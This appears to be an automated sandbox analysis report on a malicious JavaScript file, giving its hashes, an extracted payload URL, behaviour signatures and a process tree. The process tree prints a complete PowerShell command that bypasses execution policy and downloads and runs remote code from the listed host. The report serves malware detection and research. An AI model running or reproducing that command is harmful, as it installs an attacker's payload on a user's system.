Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:36
Static task
static1
Behavioral task
behavioral1
Sample
a1cad1cb52b72c86925e612e05ef7e25372b880c46ad26091879206d6149c8af.js
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
a1cad1cb52b72c86925e612e05ef7e25372b880c46ad26091879206d6149c8af.js
Resource
win10v2004-20240226-en
General
-
Target
a1cad1cb52b72c86925e612e05ef7e25372b880c46ad26091879206d6149c8af.js
-
Size
72KB
-
MD5
f3f9f0917ae1f7eccab673d03b7920b7
-
SHA1
25199b53272a48bfec65b372f8ea380c2940730b
-
SHA256
a1cad1cb52b72c86925e612e05ef7e25372b880c46ad26091879206d6149c8af
-
SHA512
5fb9673ec5c3cdf5e5dc5d2c835733d25fbcfa24e466d49bc06ac4a951f29ae3809de93333689491a63c006a0628d23a6d543b713d978ac87e96badd2644383a
-
SSDEEP
1536:um22QRkoft4s0rkn5oEV3KQ4G1QrFylAe0wucR58Xh1G/fQF:um2jEYVDdQrFyl4ub8Xh1G/fQF
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2976 powershell.exe 4 2976 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2976 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2976 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1148 wrote to memory of 2976 1148 wscript.exe 28 PID 1148 wrote to memory of 2976 1148 wscript.exe 28 PID 1148 wrote to memory of 2976 1148 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\a1cad1cb52b72c86925e612e05ef7e25372b880c46ad26091879206d6149c8af.js1⤵
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2976
-